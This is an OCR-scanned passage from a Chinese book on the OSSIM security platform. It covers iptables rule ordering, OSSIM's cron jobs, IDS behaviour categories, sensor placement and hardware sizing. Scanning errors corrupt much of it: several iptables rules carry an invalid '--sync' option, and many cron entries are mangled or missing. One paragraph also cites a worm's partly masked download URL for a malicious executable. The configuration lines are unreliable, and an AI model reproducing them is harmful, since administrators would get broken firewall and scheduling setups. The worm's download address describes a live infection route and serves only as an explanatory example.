防火 墙 规则 顺序 也 会 影响 其 工作 效率 ， 例 如 客户 端 通过 Linux 防火 墙 收取 外 网 邮件 ， 客 
户 端 使 用 程序 为 Outlook， 使 用 的 是 Pop3 协议 。 防 火 墙 规则 如 下 : 

(1) iptables -A INPUT -p tcp --syn -m state --state NEW --dport 22 -j ACCEPT 

(2) iptables -A INPUT -p tcp --sync -m state --state NEW --dport 25 -j ACCEPT 

(3) iptables -A INPUT -p tcp --sync -m state --state NEW --dport 80 -j ACCEPT 


(4) iptables -A INPUT -p tcp --sync -m state --state NEW --dport 110 -j ACCEPT 
(5) iptables -A INPUT -p all -m state --state ESTABLISHED,RELATED -j ACCEPT 


当 客 户 端的 第 一 个 封包 需要 花费 4 次 匹配 动作 ， 如 果 一 封 邮 件 需 要 1000 个 封包 的 话 ， 再 
加 上 TCP 三 次 握手 的 封包 这 样 的 匹配 的 次 数 达 到 数 万 次 之 多 ， 如 果 将 第 四 条 规则 移 到 第 一 
条 ， 那 么 匹配 次 数 只 需 1000 多 次 ， 由 此 可 见 规则 的 顺序 对 于 防火 墙 性 能 有 着 很 大 影响 。 所 以 
需要 将 使 用 频 度 最 高 的 规则 写 在 第 一 个 ， 以 后 以 此 类 推 。 那么 ， 如 何 确定 哪个 规则 使 用 频率 高 
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或 者 低 呢 ? 可 使 用 下 面 命令 查看 : 


alienvault:-£ iptables -L -n -v 
Chain INPUT (policy ACCEPT O packets, O bytes) 


pkts bytes target prot opt in out source destination 
O — 0 DROP icmp -- * * 0.0.0.0/0 0.0.0.0/0 icmp type 13 

5239 499K ACCEPT icmp -- * * 0.0.0.0/0 0.0.0.0/0 

1189K 403M ACCEPT all -- lo * 0.0.0.0/0 0.0.0.0/0 

67007 88M ACCEPT all -- * * 0.0.0.0/0 0.0.0.0/0 state RELATED, ESTABLISHED 
11 620 ACCEPT top s * * 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:22 
0 0 ACCEPT top == * * 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:40007 
0 0 ACCEPT tp -= * * 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:33800 


还 有 特殊 情况 ， 封 包 从 INPUT 链 进来 ， 从 第 一 条 规则 匹配 到 最 后 一 条 都 没有 匹配 成 功 ， 
怎么 办 ? 系统 已 有 考虑 ， 在 每 个 链 的 最 后 有 一 条 默认 策略 ， 而 且 这 条 默认 策略 总 是 最 后 才 被 匹 
配 , 而 且 这 条 默认 策略 的 状态 只 有 一 种 (ACCEPT EÈ DROP), 我 们 假设 默认 策略 为 ACCEPT, 
那么 封包 这 时 可 以 进入 到 本 地 进程 如 果 为 DROP, 则 被 默认 策略 丢弃 , 最 后 强调 一 点 Netfilter 
的 默认 策略 预 设 值 为 ACCEPT， 这 也 可 以 修改 。 我 们 查看 40001 端口 是 否 在 监听 状态 ， 可 以 
使 用 netstat 命令 ， 也 可 以 使 用 iptables， 应 用 如 下 : 


LISTEN 107 86130 20412/0ssim-serve 


anienvault:- [iptables -L -xvn [grep 40001 
"© ACCEPT tp -- * 


0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:40001 
alienvault:-4 B 


1.9.3 iptables 规则 库 管 理 

我 们 知道 iptables 的 规则 被 存储 在 各 种 不 同 的 链 中 ， 相 当 于 一 个 规则 库 。 当 我 们 修改 完 规 
则 可 用 iptables-save 命令 进行 存储 。 

#iptables-save > /etc/ossim firewall  /* 将 防火 墙 规则 保存 输出 到 文件 */ 


这 样 操作 后 ， 对 于 OSSIM 系统 而 言 ，iptables 规则 存储 在 /etc/ossim_firewall 文件 中 ， 每 次 
启动 系统 时 ， 会 通过 iptables-restore 调用 /etc/ossim_firewall 文件 到 内 存 中 ， 但 是 这 样 管理 未 必 
是 好 事 ， 比 如 ， 规 则 库 中 有 100 条 规则 ， 其 中 有 80 条 规则 都 包含 地 址 192.168.11.10， 那 么 如 
果 需 要 修改 将 原来 的 192.168.11.10 KUR 192.168.12.10， 你 打算 将 所 有 的 地 址 都 重新 输入 一 遍 
吗 ? 这 样 效率 太 低 。 可 建议 大 家 采用 脚本 管理 方式 ， 也 就 是 将 规则 写 入 Shell 脚本 ， 这 样 可 以 
将 卫 地 址 存储 变量 中 。 重 新 加 载 防火 墙 命令 如 下 : 

falienvault-firewall-reload 

#iptables -S /* 注 意 是 大 写字 母 S， 这 相当 于 --1ist-rules*/ 

如 果 读 者 掌握 以 上 内 容 后 ， 对 于 今后 需要 在 OSSIM Server. 上 开放 某 个 端口 应 该 不 会 有 问 
题 ， 另 外 ， 系 统 在 /etc/ossim/firewall_include 文件 中 给 出 了 模板 ， 参 照 此 模板 编写 iptables 规则 
会 简单 许多 ， 而 在 /etc/iptables/ 目 录 下 的 规则 ， 可 以 将 各 种 服务 的 通信 端口 和 防火 墙 规则 对 应 
起 来 。 
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OSSIM 的 计划 任务 


计划 任务 是 系统 在 约定 的 时 间 ， 执 行 已 经 计划 好 的 工作 。 在 Linux 中 我 们 经 常用 到 cron 
来 完成 这 项 工作 。cron 服务 器 可 以 根据 配置 文件 约定 的 时 间 来 执行 特定 的 任务 。 当 cron 启动 
后 ,会 读 取 所 有 配置 文件 (全 局 性 配置 文件 /etc/crontab, 以 及 每 个 用 户 的 计划 任务 配置 文件 中 )， 
然后 根据 命令 和 执行 时 间 来 按时 调度 任务 。 


1.10.1 Linux 计划 任务 


crontab 用 于 设置 周期 性 被 执行 的 任务 〈 指 令 )。 该 命令 从 标准 输入 设备 读 取 指令 ， 并 将 其 
存放 于 “crontab" 文 件 中 ， 图 1-52 展示 了 时 间 表 如 何 分 配 。 


| 


"表示 小 时 pe 中 第 REG ES * 执 行 的 脚本 


1-52 crontab 各 区 域 分 配 含义 


Al: minute 一 分 钟 ， 从 0~ 59 的 任何 整数 。 

A2: hour 一 小 时 ， 从 0~23 的 任何 整数 。 

A3: day— 日 期 ， 从 1~31 的 任何 整数 。 

A4: month 一 月 份 , 从 1~ 12 的 任何 整数 ( 或 使 用 月 份 的 英文 简写 如 Jan. Feb 等 ) 。 
A5: week— 星期 从 0~7 的 任何 整数 ， 这 里 的 0 或 7 代表 星期 日 (或 使 用 星期 
的 英文 简写 如 Sun、Mon 等 ) 。 

€ A6: 脚本 一 要 执行 的 命令 (命令 可 以 是 ls /proc >> /tmp/proc 之 类 的 命令 ) 。 


在 Al~A5 的 框 中 ， 可 填 星 号 〈*)， 用 来 代表 所 有 有 效 的 值 。 比 如 ， 月 份 值 中 的 星 号 意味 
着 在 满足 其 他 制约 条 件 后 每 月 都 执行 该 命令 。 整数 间 的 短线 Co 指定 一 个 整数 范围 。 比 如 ， 
1-5 意味 着 整数 1、2、3、4、5 用 逗号 (，) 隔 开 的 一 系列 值 指定 一 个 列表 。 比 如 ，1、2、3、 
4、5 表明 这 5 个 指定 的 整数 。 
ERR C) 可 以 用 来 指定 间隔 频率 。 在 范围 后 加 上 /<integer> 意 味 着 在 范围 内 可 以 跳 过 
integer。 比 如, 0-59/2 可 以 用 来 在 分 钟 字段 定义 每 两 分 钟 。 间 隔 频 率 值 还 可 以 和 星 号 一 起 使 用 。 
比如 ，*/3 的 值 可 以 用 在 月 份 字段 中 表示 每 3 个 月 运行 1 次 任务 。 
/etc/cron.hourly: 代表 每 小 时 执行 脚本 ; 
letc/cron.daily: 代表 每 天 执行 脚本 ; 
letc/cron.weekly: 代表 每 周 执行 脚本 ; 
letc/cron.monthly: 代表 每 月 执行 脚本 。 


如 果 某 个 任务 需要 根据 调度 来 执行 ， 而 不 是 每 小 时 、 每 天 、 每 月 执行 ， 那 么 可 以 添加 到 
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/etc/cron.d 目录 下 ， 该 目录 中 所 有 文件 和 /etc/crontab 中 应 用 相同 语法 结构 。 下 面 以 OSSIM 系 
统 举例 说 明 : 


Bl 1: 


代表 : 每 月 每 天 每 小 时 的 第 15 分 钟 执行 一 次 update_reputation.py 脚本 。 如 果 当 前 时 间 为 
2014-12-28 22:15:00， 那 么 接 下 来 2 次 执行 时 间 是 : 


€ 2014-12-28 22:15:00 
€ 2014-12-28 23:15:00 
€ 2014-12-29 00:15:00 


Ji 2: 


每 隔 1 分 钟 执行 nessus_jobs.pl 脚本 ， 但 不 显示 在 屏幕 上 。 那 么 执行 该 脚本 后 ， 下 3 次 执 
行 时 间 是 : 


@ 2014-12-28 21:44:00 
€ 2014-12-28 21:45:00 
€ 2014-12-28 21:46:00 


x 
e 


第 9 分 钟 和 第 39 分 钟 执行 一 次 后 面 的 脚本 。 那 么 执行 该 脚本 后 ，3 次 时 间 是 : 


€ 2014-12-28 22:09:00 
€ 2014-12-28 22:39:00 
€ 2014-12-28 23:09:00 


例 4: 


表示 从 第 5 分 钟 到 第 55 分 钟 ， 每 10 分 钟 执行 一 次 ， 共 可 以 执行 4 次 。 那 么 执行 该 脚本 
后 ， 下 4 次 时 间 是 : 


€ 2014-12-28 21:55:00 
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€ 2014-12-28 22:05:00 
€ 2014-12-28 22:15:00 
€ 2014-12-28 22:25:00 
例 5: 


alienvault:/etc/cron.df cat av update cpe 
0 23 * * * root /usr/bin/alienvault-update-cpe »/dev/null 


每 晚 23 点 执行 alienvault-update-cpe 脚本 。 那 么 执行 该 脚本 后 ， 下 3 次 时 间 是 : 


€ 2014-12-28 23:00:00 
€ 2014-12-29 23:00:00 
€ 2014-12-30 23:00:00 


1.10.2. OSSIM 中 的 计划 任务 


1. Cron.d 全 局 计划 任务 

当 我 们 要 增加 全 局 计划 任务 时 ， 可 直接 修改 /etc/crontab。/etc/cron.d 目录 就 是 为 了 解决 这 
种 问题 而 创建 。 以 下 计划 任务 采用 OSSIM 4.8 平 台 来 讲解 。/etc/crontab 为 系统 crontab 配置 文 
fF, 通常 只 能 被 root 用 户 和 守护 进程 用 来 设置 系统 类 的 cron 任务 ， 所 有 Linux 用 户 须 使 用 
crontab 来 创建 、 编 辑 cron 任务 。 

例如 增加 一 项 定时 备份 任务 可 以 这 样 处 理 ,在 /etc/cron.d 目录 下 新 建文 件 Update_sensors 
内 容 如 下 : 

[Ua EU root [ -x /usr/bin/alienvault-update sensors ] && 
/usr/bin/alienvault-update sensors 


该 目录 下 还 有 如 表 1-10 所 示 的 重要 的 计划 任务 。 
表 1-10 OSSIM 全 局 计划 任务 


脚本 名 称 : alienvault ip reputation 


15 * * * * root /usr/share/ossim-installer/update reputation.py 


alienvault ip reputation feedback 
30 * * * * root /usr/share/ossim/scripts/send reputation feedback.py 
脚本 名 称 : av update cpe 


023*** root /usr/bin/alienvault-update-cpe >/dev/null 


脚本 名 称 : munin 
*[5** xn munin if [ -x /usr/bin/munin-cron ]; then /usr/bin/munin-cron; fi 
4109*** munin if [ -x /usr/share/munin/munin-limits ]; then /usr/share/munin/munin-limits —force 


--contact nagios --contact old-nagios; fi 
脚本 名 称 : Munin-node 
*/5 * * * * root if [ -x /etc/munin/plugins/apt all ]; then /etc/munin/plugins/apt all update 7200 12 >/dev/null; elif 


-X /etc/munin/plugins/apt |: then /etc/munin/plugins/apt update 7200 12 —/dev/null; fi 
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脚本 名 称 : OSSIM-cd-tools 

01 * * * root /usr/bin/unauto-apt > /dev/null 

02 * * * root /usr/bin/apt-get autoclean > /dev/null 

脚本 名 称 : OSSIM-scanner-job 

*/2****r0ot. /usr/share/ossim/scripts/vulnmeter/nessus jobs.pl -c >> /var/log/ossim/nessus jobs 2>&1 

脚本 名 称 : Php5 

09,39 * uide root  [ -x /usr/lib/phpS/maxlifetime ] && [ -d /var/lib/php5 ] && find /var/lib/php5/ 
-type f-cmin +$ C/usr/lib/phpS/maxlifetime) -delete 

脚本 名 称 ， Update_sensors 〈 每 小 时 运行 一 次 ) 


orte root [ -x /usr/bin/alienvault-update sensors ] && /usr/bin/alienvault-update sensors 

cron 进程 执行 时 ， 会 自动 扫描 该 目录 下 的 所 有 文件 ， 按 照 文件 中 的 时 间 设 定 执行 后 面 的 
命令 。cron 执行 时 ， 也 就 是 要 读 取 三 个 地 方 的 配置 文件 : 

€ /etc/crontab, 

€ /etc/cron.d 目录 下 的 所 有 文件 。 

e ”每 个 用 户 的 配置 文件 。 

需要 注意 的 是 , 这 些 计划 任务 脚本 文件 的 所 有 者 和 权限 都 是 root, 该 任务 都 是 以 root 身份 
完成 。 

2. 添加 调度 任务 


管理 员 可 在 /etc/cron.daily/、/etc/cron.hourly/、/etc/cron.weekly/ 中 添加 调度 ， 这 几 个 目录 系 
统 已 经 设置 好 ， 定 时 运行 着 每 天 、 每 周 、 每 月 、 每 小 时 的 调度 任务 。 所 以 可 以 简单 地 将 需要 执 
行 的 调度 任务 ， 存 放 到 相应 的 目录 中 ，cron.hourly 每 小 时 运行 一 次 该 目录 中 所 有 脚本 ， 如 表 
1-11 所 示 。 


表 1-11 每 小 时 计划 任务 
脚本 名 称 : ossim-compliance 
/usr/bin/perl -I"/usr/share/ossim/compliance/scripts/datawarehouse/perl" 


"/usr/share/ossim/compliance/scripts/datawarehouse/OSSIM ETL.job ReportingETL.pl" -context- Default 
脚本 名 称 : ossim-compliance-iso27001 
/usr/bin/perl /usr/share/ossim/compliance/scripts/datawarehouse/iso2700]1 sid.pl 
脚本 名 称 : ossim-sem 
sh /usr/share/ossim/scripts/sem/forensic hourly.sh 
脚本 名 称 : scheduler-report 
/usr/bin/php /usr/share/ossim/scripts/report/launcher.php >> /tmp/logscheduler 2>&1 


cron.daily 每 天 要 执行 的 脚本 文件 ， 如 表 1-12 所 示 。 
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表 1-12 每 日 计划 任务 
脚本 名 称 : alienvault-passvulnupdate (升级 CVE) 
cd /usr/share/ossim-cd-tools/cve/ 
wget -N http://data.alienvault.com/cve/nvdcve-2.0-current.xml.bz2 


bunzip2 nvdcve-2.0-current.xml.bz2 
脚本 名 称 : check-tickets 
/usr/bin/php /usr/share/ossim/scripts/incidents/check tickets.php. 
脚本 名 称 : clean-alarms 
#DELETE ALARMS 
/usr/bin/php /usr/share/ossim/scripts/alarms/delete_alarms.php 
#ASSET SYNC DUMP 
/usr/share/ossim/scripts/assets_sync.sh 
脚本 名 称 : logrotate 
test -x /usr/sbin/logrotate || exit 0 
/usr/sbin/logrotate /etc/logrotate.conf 


cron.weekly 每 周 运行 一 次 该 目录 下 的 所 有 脚本 ， 如 表 1-13 所 示 。 
表 1-13 每 周 计划 任务 


脚本 名 称 : alienvault-ossec 
find /var/ossec/logs/alerts/ -mtime +7 -type f -exec rm {} \; ”删除 /var/ossec/logs/alerts 目录 下 七 天 前 的 文件 


find /var/ossec/logs/alerts/ -type d -empty -exec rmdir ( V — 寻找 /var/ossec/logs/alerts 目录 下 将 空 文件 夹 删除 
chown www-data:ossec /var/ossec/logs/ -R 


小 结 


本 章 从 SIM 一 直 介 绍 到 OSSIM 系统 ， 阅 明了 各 系统 的 差异 ， 文 中 重点 讲述 了 OSSIM 发 
展 及 系统 架构 和 工作 原理 , 尤其 是 各 种 安全 插件 的 使 用 , 代理 的 安装 和 使 用 以 及 关联 引擎 的 作 
用 ， 系 统 数据 库 和 端口 的 分 布 等 重要 内 容 。 同 时 也 讲解 了 RabbitMQ 中 间 件 系统 在 高 性 能 
OSSIM 系统 中 的 作用 ，OSSIM 高 可 用 架构 以 及 OSSIM 系统 的 计划 任务 列表 的 工作 情况 。 理 
解 本 章 介绍 的 内 容 对 于 下 一 章 安装 部 署 OSSIM 系统 有 着 重要 意义 。 
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第 2 章 
«OSSIMBDE ESSE > 


从 本 章节 可 以 学 习 到 : 


OSSIM 安装 策略 
分 布 式 OSSIM 体系 
安装 前 的 — 
OSSIM 服务 器 
OSSIM USM eda 区 别 
OSSIM Web 前 端 初始 化 方法 
VPN 连接 
分 布 式 部 署 实战 
系统 安装 后 续 工 作 
OSSIM 远程 管理 工具 
安装 桌面 环境 
Alarm 报警 分 析 
ia SIEM 控制 台 
见 OSSIM 安装 错误 分 析 


OSSIM 安装 策略 


正确 部 署 OSSIM 系统 非常 重要 ， 通 常 我 们 要 考虑 几 个 问题 : 


@ ”应 该 监控 什么 ? 有 些 使 用 者 想 通 过 Snort 监控 所 有 的 计算 机 和 网 络 设备 ， 这 是 不 现实 
的 ， 一 般 我 们 只 用 它 来 监控 重要 的 服务 器 及 网 络 设备 。 

哪些 报警 可 以 忽略 ? 

通常 ，Snort 架设 的 IDS 系统 会 产生 非常 多 的 报警 ， 哪 些 需要 我 们 关注 呢 ? 

传感器 放置 在 何 处 ? 

如 果 发 现 违规 行为 如 何 处 理 ? 
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2.1.1 未 授权 行为 
在 OSSIM 系统 中 ， 以 Snort (最 新 版 本 为 Suricata) 为 主 的 IDS 是 一 个 重要 功能 ， 主 要 提供 针 
对 网 络 的 异常 行为 和 可 疑 行为 监控 , 在 OSSIM 系统 中 通过 配置 Snort 的 特征 码 对 未 授权 的 行为 进 
行 监控 并 报警 。 什 么 是 未 授权 行为 ? 通常 对 于 一 个 基于 网 络 的 入 侵 检 测 系 统 而 言 ， 不 被 允许 的 行 
为 分 为 : 恶意 行为 、 可 颖 行为、 异常 行为 和 不 适当 行为 ， 它 们 都 属于 未 授权 行为 。 
(1) 恶意 行为 《Malicious behavior) 
一 般 来 讲 ,， 所 有 的 未 授权 行为 就 是 恶意 行为 。 比 如 远程 特洛伊 木马 流量 ,用 户 提 权 ,DOS 
服务 攻击 。 
(2) 可 疑 行 为 (Suspicious behavior) 
我 们 知道 SYN 表示 建立 连接 时 使 用 的 握手 信号 ， 而 FIN 则 表示 终止 链接 ， 从 逻辑 上 讲 一 
个 包 不 应 该 同时 包含 SYN 和 FIN， 如 果 发 现 这 种 包 的 流量 ， 那 么 很 有 可 能 是 攻击 者 蓄意 构造 
的 (利用 nmap 就 能 制定 使 用 IP 分 片 方式 发 送 碎片 探测 包 )， 它 具有 可 疑 行为 。 单 纯 的 就 SYN 
和 FIN 包 本 身 而 言 并 没有 恶意 行为 ， 但 这 两 种 包 放 到 一 起 进行 试探 ， 即 构成 了 可 疑 行为 。 由 
此 推广 开 来 ， 只 要 有 人 试图 在 很 短 时 间 内 访问 了 大 量 主 机 和 端口 ， 表 明 是 可 疑 行为 。 
(3) 异常 行为 (Anomaly Behavior ) 
与 正常 行为 不 同 的 称 为 异常 行为 , 注意 异常 不 等 同 于 安全 事故 , 但 有 可 能 是 事故 发 生 的 早 
期 征兆 。 我 们 把 事故 反 过 来 念 就 是 故事 , 每 一 起 网 络 安全 的 事故 背后 都 有 一 段 故事 ， 作 为 网 络 
安全 人 员 就 需要 了 解 其 中 的 玄机 ， 不 能 麻痹 大 意 。 
我 们 通过 实例 去 理解 它 ， 内 网 里 有 一 台 没 有 安装 TFTP 服务 的 服务 器 ， 但 发 现 了 TFTP 流 
量 ， 这 就 是 异常 行为 。 在 没有 开放 文件 共享 的 Windows Server 中 出 现 了 向 外 网 的 文件 共享 访 
问 ， 监 测 到 139、135 端口 TCP 连接 的 情况 这 也 属于 异常 行为 。 
以 上 两 种 行为 就 不 属于 入 侵 的 前 兆 , 而 是 入 侵 行为 已 经 发 生 的 标志 。 可 能 攻击 者 已 经 成 功 
地 攻击 了 一 台 主 机 ， 但 没有 触发 报警 当然 也 不 排除 是 内 部 用 户 利用 合法 权限 攻击 了 主机 )。 
如 果 企 业 采 用 分 布 式 方式 部 署 了 OSSIM 或 类 似 工 具 即 能 捕获 这 些 异常 行为 。 
(4) 不 适当 行为 (Inappropriate Activity) 
有 些 未 授权 行为 ， 既 不 是 恶意 行为 也 不 是 有 害 的 ， 但 对 组 织 而 言 属于 未 授权 行为 ， 这 类 行 
为 可 能 带 来 麻烦 。P2P 的 安全 问题 由 来 已 久 ，P2P 软件 和 技术 本 身 可 能 是 无 害 的 ， 但 共享 的 资 
源 文件 中 却 可 能 因为 存在 漏洞 而 被 利用 , 由 于 其 无 中 心 化 以 及 自分 发 节点 不 可 控 的 特性 , 成 为 
企业 资料 泄漏 的 重要 途径 。 网 络 攻 击 者 能 利用 P2P 的 技术 弱点 发 动 网 络 攻击 ， 或 者 成 为 恶意 
软件 ， 病 毒 传播 ， 不 法 信息 传播 的 温床 。 例 如 P2P 文件 下 载 或 共享 ， 这 种 行为 能 穿 透 防火 墙 
达到 传输 秘密 文件 的 目的 ， 在 一 些 Malware 事件 中 通过 这 类 程序 会 专门 繁殖 蠕虫 和 病毒 〈 例 
如 ，P2P 蠕虫 Worm.Win32.Palevo.arxz， 就 是 通过 P2P 共享 文件 传播 自身 )。 该 蠕虫 还 会 自动 
连接 http://188.***.27/jebacina/418.exe， 下 载 最 新 的 版 本 ， 实 现 自动 更 新 。 
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2.1.2 ”传感器 位 置 

OSSIM 的 传感器 放置 位 置 非常 重要 ， 下 面 是 常见 的 两 种 Sensor 安装 位 置 : 

(1) 传感器 放 在 防火 墙 外 

如 果 放 置 在 防火 墙 之 外 , 那么 它 允 许 最 大 范围 的 监控 进出 内 网 的 所 有 流量 。 传 感 器 能 监测 
到 许多 防火 墙 阻 断 的 试探 性 攻击 。 但 是 把 传感器 推 上 一 线 , 那么 就 意味 着 没有 任何 保护 , 很 容 
易 受 到 黑客 的 袭击 。 

(2) 传感器 放置 在 防火 墙 内 

比较 常见 的 另 一 种 方式 就 是 放 在 防火 墙 内 部 , 这 样 能 对 成 功 通过 防火 墙 的 流量 进行 分 析 和 
监控 ， 后 面 我 们 会 详细 讨论 这 种 放置 方式 。 


分 布 式 OSSIM 体系 


当 监 控 千 光 网络 时 ， 单 机 安装 的 OSSIM 系统 会 带 来 性 能 问题 ， 目 前 最 新 的 OSSIM 系统 
都 支持 分 布 式 部 署 。OSSIM 最 常见 的 安装 方式 是 三 层 体系 ， 分 步 式 部 署 如 图 2-1 所 示 。 


Ossim: -3 
图 2-1 OSSM 分 布 式 部 署 示意 图 


1. 第 一 层 传感器 ( Sensor ) 
收集 数据 包 的 第 一 层 就 是 传感器 (Sensor) 层 ， 它 通过 对 镜像 到 SPAN 的 流量 进行 监控 来 
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发 现 异常 和 入 侵 行为 。 对 传感器 的 要 求 如 下 : 


@ ”实现 收集 所 有 数据 包 必 须 在 交换 机 上 做 端口 镜像 (SPAN) ; 

@ ”从 性 能 和 安全 上 考虑 ，OSSIM 传感器 遵循 分 配 最 小 特权 的 原则 ; 

@ ”传感器 安装 两 块 网 卡 : 一 块 作为 管理 接口 使 用 ， 配 有 IP 地 址 ， 另 一 个 则 为 嗅 探 接口 
使 用 ， 无 须 配置 IP 地 址 ， 嗅 探 器 程序 监听 在 该 接口 ， 这 种 配置 是 可 管理 性 和 安全 性 
的 最 佳 组 合 ， 设 置 思路 是 让 抓 包 ( 数据 包 的 截获 与 分 析 ) 的 数据 包 从 一 个 接口 进入 ， 
所 有 报警 从 另 一 个 接口 送出 。 


| 抓 包 的 网 卡 不 用 分 配 IP 地 址 ， 直 接连 接 到 受 监控 网 段 ， 以 便 流 量 以 一 个 方向 流通 ， 也 就 
是 从 受 监控 网 段 流 向 传感器 。 正 因为 接收 数据 包 的 网 卡 没有 全， 从 而 也 避免 了 黑客 直接 
| 攻击 传感器 。 注 意 ， 管 理 接口 需要 分 配 IP 地 址 ， 与 监控 网 段 不 在 同一 个 VLAN。 


2. 第 二 层 服务 器 ( Server ) 


服务 器 层 主要 是 收集 传感器 收集 报警 数据 , 并 将 其 转换 成 用 户 便于 理解 的 格式 。 报警 数 据 
经 处 理 后 被 导入 MySQL 数据 库 。 在 OSSIM 系统 里 ， 可 同时 将 Snort 报警 发 往 数 据 库 和 系统 
日 志 Syslog 中 。 报 和 警 在 入 数据 库 中 便于 查询 管理 ， 可 以 更 好 地 管理 报警 消息 ， 方 便 GUI 图 形 
界面 为 用 户 展现 数据 。 


3. 第 三 层 SIEM 分 析 控 制 台 
第 三 层 是 OSSIM 系统 的 展现 层 ， 是 安全 分 析 人 员 最 常用 的 Web 前 端 界 面 。 


2.2.1 ”特别 应 用 

目前 OSSIM 64 位 版 本 对 于 监控 10/100M 网 络 环境 没有 问题 , 如 果 是 千 兆 网 络 环境 , 在 三 
层 交 换 机 上 监控 多 个 VLAN 的 流量 显得 有 些 吃 力 , 交换 机 设置 端口 镜像 后 同样 会 使 CPU 占用 
率 上 升 。 据 统计 ， 当 流量 超过 500Mb/s 时 ， 在 OSSIM 分 析 数 据 包 时 会 出 现 响应 迟缓 ， 伴 随 丢 
包 现 象 出 现 ， 而 且 准确 性 迅速 下 降 。 

其 实在 IDS 系统 中 ,存在 数据 处 理 瓶 颈 。 数 据 包 处 理 的 难点 是 IP 碎片 重组 和 TCP 流量 重 
组 。 而 这 两 种 重组 过 程 在 IDS 系统 中 完成 ， 需 要 对 数据 包 进 行 深度 检测 〈 例 如 进行 数据 包 模 
式 匹 配 )。 在 千 兆 网 络 环境 中 , IP 碎片 重组 和 TCP 流 重 组 需要 强大 的 CPU 处 理 能 力 , 比如 TCP 
用 于 控制 数据 流 的 窗口 ， 最 大 可 以 为 64KB， 当 IDS 系统 需要 同时 维护 1,000,000 个 TCP 会 话 
时 ， 即 使 缓冲 区 大 小 为 4KB， 其 所 占 的 内 存 空间 达到 4GB。 面 对 复杂 的 过 程 ， 系 统 响应 速度 
会 有 所 下 降 。 


2.2.2 % IDS 系统 应 用 
有 些 特殊 场合 为 了 鉴别 各 种 IDS 的 特性 , 会 同时 使 用 多 套 IDS 系统 ， 如 安装 OSSIM 然后 
同时 使 用 HP-Arcsight 分 析 网 络 数据 包 CX, IBM QRadar)， 这 时 传统 端口 镜像 (SPAN ) 的 方 
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法 无 法 满足 。 也 就 是 说 遇 到 需要 将 一 个 监测 数据 流传 送 给 多 台 监 测 设备 的 情况 , 采用 SPAN 无 
法 满足 。 


在 网 络 核心 设备 上 打开 SPAN 需 慎重 ， 如 果 CPU 利用 率 长 期 超过 20%， 则 不 建议 打开 ， 
| 以 免 影响 网 络 性 能 。 


对 于 这 两 种 情况 我 们 可 以 采用 网 络 分 流 器 的 设备 解决 , 它 是 一 个 独立 的 硬件 , 支持 千 兆 其 
至 是 万 兆 网 络 环境 (比如 Gigamon 的 方案 ), 而 且 它 不 会 对 已 有 网 络 设备 的 负载 带 来 任何 影响 ， 
这 与 端口 镜像 等 方式 相 比 具有 极 大 的 优势 。 它 的 分 流 模式 是 将 被 监控 的 UTP 链 路 用 TAP 分 流 
设备 一 分 为 二 ， 分 流出 来 的 数据 接 入 采集 接口 ， 为 信息 安全 监控 系统 采集 数据 。 


安装 前 的 准备 工作 


工 欲 善 其 事 ， 必 先 利 其 器 。 作 为 OSSIM 的 使 用 者 ， 对 于 企业 网 中 部 署 OSSIM 你 真 的 准 
备 好 了 吗 ? 从 软件 方面 看 对 于 系统 维护 \ 网 络 管理 以 及 安全 管理 知识 体系 是 否 全面 了 解 呢 ? 在 
本 章 中 部 署 OSSIM 是 需要 使 用 者 具有 系统 工程 师 、 网 络 架构 师 和 安全 分 析 师 多 种 角色 的 知识 ， 
下 面 重点 从 硬件 选 型 上 讲解 OSSIM 准备 安装 前 的 注意 事项 。 


2.3.1 软 硬 件 配备 

(1) 首先 确定 监控 范围 。 需 要 监控 几 个 网 段 内 的 多 少 台 服 务 器 ， 每 台 设备 的 日 最 高 流量 
为 多 大 《需要 按 峰 值 考虑 )， 每 台 设备 都 需要 能 联系 到 相应 的 管理 员 。 

(2) 确定 监控 对 象 ， 虽 说 OSSIM 能 够 监控 多 种 设备 ， 但 实际 上 为 了 保证 性 能 ， 不 能 无 
节制 地 打开 各 种 服务 。 

GO 从 人 员 配 备 上 看 ， 需 由 专人 负责 管理 ， 维 护 OSSIM 的 人 员 ， 首 先 应 该 是 具有 一 定 
工作 经 验 的 Linux 工程 师 , 熟悉 Linux 系统 + 网 络 架 构 +MySQL+PHP, 即 熟 悉 Linux 系统 运 维 、 
MySQL 数据 库 运 维 、 信 息 安全 管理 ， 也 需要 掌握 网 络 编程 知识 。 

(4) 硬件 选择 ， 可 以 采用 品牌 服务 器 , 对 于 中 小 企业 也 可 以 根据 自己 需求 ， 以 OSSIM 4.8 
系统 为 例 ， 目 前 系统 对 多 核 性 能 支持 得 比较 好 ， 推 荐 采用 至 强 E 系列 处 理 器 ，OSSIM 在 漏洞 
扫描 、Ossec 扫描 、Snort 事件 分 析 时 会 消耗 大 量 CPU， 所 以 要 尽量 选择 高 性 能 CPU， 尤其 是 
在 OSSIM USM 发 展 到 5.0 之 后 ， 数 据 库 采 用 了 MySQL 5.6， 对 多 CPU 处 理 能 力 需求 更 高 。 


就 内 存 而 言 ， 只 有 一 个 道理 ， 越 大 越 好 。 当 数据 库 的 全 部 数据 页 能 保存 在 缓冲 池 中 ， 那 么 
其 性 能 理论 上 是 最 优 状态 。 对 于 新 版 本 OSSIM， 建 议 需要 配备 16GB 以 上 内 存 ， 经 过 长 期 测 
试 ， 对 于 OSSIM 4.3 (64 位 ) 版 本 系统 而 言 ， 如 果 内 存 分 配 小 于 6GB， 在 实际 测试 中 系统 工 
作 一 段 时 间 之 后 ， 由 于 内 存 溢出 等 问题 ， 可 能 出 现 某 些 服 务 自动 重启 或 没有 响应 的 情况 。 

所 以 32GB 内 存 是 系统 稳定 运行 的 经 验 值 ( 而 且 监控 选项 和 插件 选项 需要 针对 性 地 打开 )， 
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另外 系统 还 需要 2TB 的 存储 空间 ， 有 条 件 内 存 配 备 32GB 以 上 比较 理想 。 笔 者 在 测试 环境 中 
采用 自己 攒 的 服务 器 ， 配 置 为 :华硕 P8Z87-K+Intel 17 4770K+32G 内 存 + 双 千 兆 Intel 网 卡 +4T 
硬盘 ， 这 个 配置 下 安装 OSSIM 4.8 一 次 性 通过 ， 运 行 效果 比较 理想 。 

在 持久 存储 上 通常 使 用 多 块 硬盘 组 成 RAID 阵列 ，OSSIM 系统 中 常 采 用 RAID 1+0 模式 ， 
但 机 械 磁盘 本 身 的 特性 决定 了 其 IOPS 性 能 比较 低 ， 而 通过 多 块 盘 做 RAID 虽 能 提升 IOPS， 
